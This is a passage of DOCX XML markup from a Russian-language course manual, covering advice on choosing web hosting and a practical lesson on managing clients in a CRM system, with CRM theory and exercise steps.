      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>зно, чтобы потом не кусать локти.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Широкий спектр выбора хостинга для размещения сайта может немного запутать новичка. Существует множество аспектов, которые нужно рассматривать и сравнивать. На некоторых хостингам очень много технических деталей, которые могут быть совсем непонятными для начинающих. В этом случае невозможно определится, понадобятся ли некоторые функции или вообще неизвестно их назначение.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В большинстве случаев рекламные предложения содержат в себе некоторые маркетинговые уловки. Поэтому нельзя обольщаться заманчивыми предложениями. Нужно конкретно понимать для каких целей нужен сайт и соответственно выстраивать требования к хостингу. Сайт с личными материалами или хобби, сайт-визитка не нуждается в огромном количестве дискового пространства, а значит и в дорогом хостинге. Можно потратить деньги лишь на регистрацию доменного имени, которое потом присоединить к любому понравившемуся хостингу.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Возможный вариант использования недорого хостинга, который сразу предлагает и регистрацию домена лучше исключить. Связываясь с недорогим и бесплатным хостингом, необходимо понимать все риски и неполадки, которые могут возникнуть. Владельцы бесплатного хостинга, в некоторых случаях могут размещать свою рекламу на вашем сайте без предупреждения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если сайт будет приносить доход, или это сайт компании, корпоративный сайт, то конечно лучше не жадничать.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Затраченные деньги на хостинг окупят себя в виде стабильной работы и надежной защиты от взлома сайта, спама и многих других неприятностей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Работая над серьезным приносящим прибыль проектом, нельзя пренебрежительно относится к выбору хостинга. Качественный хостинг не бесплатный, поэтому нужно внимательно оценивать все возможности предлагаемых пакетов хостинга.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Как сайт может помочь при продвижении программного обеспечения?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Что такое SEO-оптимизация?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Какие бывают хостинги?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB3FFC" w:rsidRPr="00617AC0" w:rsidRDefault="00CF0A98" w:rsidP="007755F7">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="221" w:name="_Toc507788276"/>
      <w:bookmarkStart w:id="222" w:name="_Toc507788551"/>
      <w:bookmarkStart w:id="223" w:name="_Toc26278753"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Практическое занятие № 34</w:t>
      </w:r>
      <w:r w:rsidR="00DB3FFC" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Освоение техники управления контактами и клиентской базой в CRM-системе</w:t>
      </w:r>
      <w:bookmarkEnd w:id="221"/>
      <w:bookmarkEnd w:id="222"/>
      <w:bookmarkEnd w:id="223"/>
    </w:p>
    <w:p w:rsidR="007363E8" w:rsidRPr="00617AC0" w:rsidRDefault="007363E8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Цель</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Управление контактами с клиентом при помощи систем CRM. Формирование навыков работы в CRM-системе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007363E8" w:rsidRPr="00617AC0" w:rsidRDefault="007363E8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Оборудование</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: персональный компьютер, CRM-система, ресурсы сети интернет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137383" w:rsidRPr="00617AC0" w:rsidRDefault="00137383" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137383" w:rsidRPr="00617AC0" w:rsidRDefault="00137383" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Провести работу с клиентской базой в CRM системе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137383" w:rsidRPr="00617AC0" w:rsidRDefault="00137383" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Требования к отчету</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Отчет, в котором содержатся изображения этапов работы с пояснениями.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Зайти в CRM систему под своим логином.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Зайти во вкладку </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Клиенты</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Используя интерфейс приложения добавить несколько клиентов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Изменить информацию у созданных клиентов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Удалить созданных клиентов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00F40D1D" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения</w:t>
      </w:r>
      <w:r w:rsidR="00E02314" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Стратегия конкурентной борьбы состоит в том, чтобы выделяться. Это означает, что необходимо тщательно выбрать оригинальный способ предложения уникального сочетания свойств</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Управление отношениями с клиентами (Customer Relationship Management, CRM) представляет собой определенную философию бизнеса, гармонизирующую стратегию, культуру ведения бизнеса, информацию о клиентах и технологию в целях взаимовыгодного управления взаимодействием предприятия и потребителя. Единственным долгосрочным конкурентным преимуществом является возможность более быстрого и обоснованного принятия решений. Сегодня уже трудно представить продукты без мощных операционных возможностей, богатой функциональности и высокого качества, рынок требует постоянного снижения цен и быстрого целевого маркетинга, и CRM постепенно становится таким же необходимым и общепринятым элементом бизнеса. И на этом промежуточном этапе у каждой компании есть шанс выделиться с помощью CRM, пока другие компании только решают, какие преимущества им может принести эта сфера управления.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CRM заключается в использовании данных о клиентах, маркетинговых моделей и реальных событий для улучшения обслуживания потребителей. Оно позволяет провести сегментацию клиентов и индивидуализировать подход к каждому клиенту. По сути CRM стал результатом интенсивной конкуренции между предприятиями. Он также является следствием осознания ими того, что завоевание нового клиента представляет собой гораздо более дорогостоящее мероприятие, чем удержание существующих, что новые клиенты, как правило, переходят от компаний-конкурентов, и что, по большому счету, любая компания есть поставщик некого </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>розничного товара</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, и ее успех зависит от его </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>продажи</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Поэтому для выживания и достижения успеха на рынке необходимо иметь четкое представление о требованиях CRM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Целями CRM являются: поддержка рационального диалога с потребителем, повышение прибыльности взаимодействия с потребителями, обеспечение широкого общего доступа потребителей к соответствующим данным компании, снижение стоимости завоевания новых клиентов, цен на продукты и услуги и текучести рентабельной клиентуры.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Каждая компания должна изыскать способ привлечения и сохранения прибыльных клиентов путем эффективного использования информации. Рынок можно завоевать не только конкурентоспособной ценой. Некоторые из лидеров рынка имеют весьма высокие для своих секторов, цены, однако они постоянно расширяют ассортимент согласно информации о предпочтениях клиентов, полученной из данных транзакций и внутренних профайлов, а также данных сторонних организаций.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Как бизнес-стратегия CRM требует от предприятия четкого понимания таких основных для управления отношениями с клиентами понятий, как удовлетворенность клиентов, достижение которой возможно через равноправный доступ к информации вне зависимости от канала связи, избранного клиентом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Невозможно улучшить то, что вы не можете оценить. И явно недостаточно оценивать клиентов только на основе общих показателей. Индивидуальная перспективная система оценки потребителя является основой сегментации. Безусловно, при ведении бизнеса разумнее концентрировать усилия не на примитивном увеличении числа клиентов, а в области повышения качества обслуживания и продления срока сотрудничества с наиболее перспективными из них. И самым лучшим средством достижения эти целей является ориентированное на CRM Хранилище данных, сочетающего в себе необходимые данные, организованный доступ к этим данным и функциональность для их соответствующей оценки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>К сожалению, многие компании, берущиеся за реализацию CRM, недостаточно продумывают аспекты организованного использования этих данных помимо собственно области управления отношениями с клиентами. Именно клиент, а не продукт, должен стать центром вселенной. Кроме того, помимо качественной технической реализации требуется синхронизация маркетинга, стратегии предприятия и управления клиентскими отношениями, иначе цели CRM просто не буду достигнуты.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Организационная структура CRM может принимать различные формы. Необходимо, однако, чтобы весь бизнес вращался вокруг клиента, а не продукта. При этом обязательными являются следующие элементы:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Управление клиентскими данными: Обеспечение качества данных и совместимости для внутренних и внешних данных, используемых для сегментации и развития продвижения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сегментация клиентов: Оценка и группировка клиентов по их прибыльности и другим показателям, важным для поддержки продвижения и управления отношениями с клиентами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Разработка целевого продвижения: Разработка целевого продвижения для отдельных потенциальных сегментов или отдельных возможных потребителей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Эффективность продвижения: Оценка эффективности продвижения в количественных показателях и выявление причин наличия/отсутствия успеха.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Управление каналами продвижения: Обеспечение возможности полного и быстрого использования канала для доставки рекламы и сообщений.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Управление удовлетворенностью клиентов: Название элемента говорит само за себя.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02314" w:rsidRPr="00617AC0" w:rsidRDefault="00E02314" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В целом, ориентация продвижения на определенных клиентов по соответствующим каналам при одновременном поддержании скоординированного имиджа компании является прерогативой руководителей фирмы. Однако, эффективный CRM требует от бизнес-команды серьезного взаимодействия и согласованности. Организационные элементы стратегии CRM важны не менее технических. Использование CRM как стратегии конкурентной борьбы означает ее обязательную поддержку на уровне организационной структуры предприятия.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF0A98" w:rsidRPr="00617AC0" w:rsidRDefault="00CF0A98" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CF0A98" w:rsidRPr="00617AC0" w:rsidRDefault="00CF0A98" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Освоение техники управления электронной торговлей (интеграция с сайтом компании, портал для клиентов или партнеров) в CRM-системе</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Зайти в CRM систему под своим логином.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Зайти во вкладку “Клиенты”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Используя интерфейс приложения добавить несколько клиентов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Изменить информацию у созданных клиентов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B05EC8" w:rsidRPr="00617AC0" w:rsidRDefault="00B05EC8" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Удалить созданных клиентов.</w:t>
      </w:r>
    </w:p>
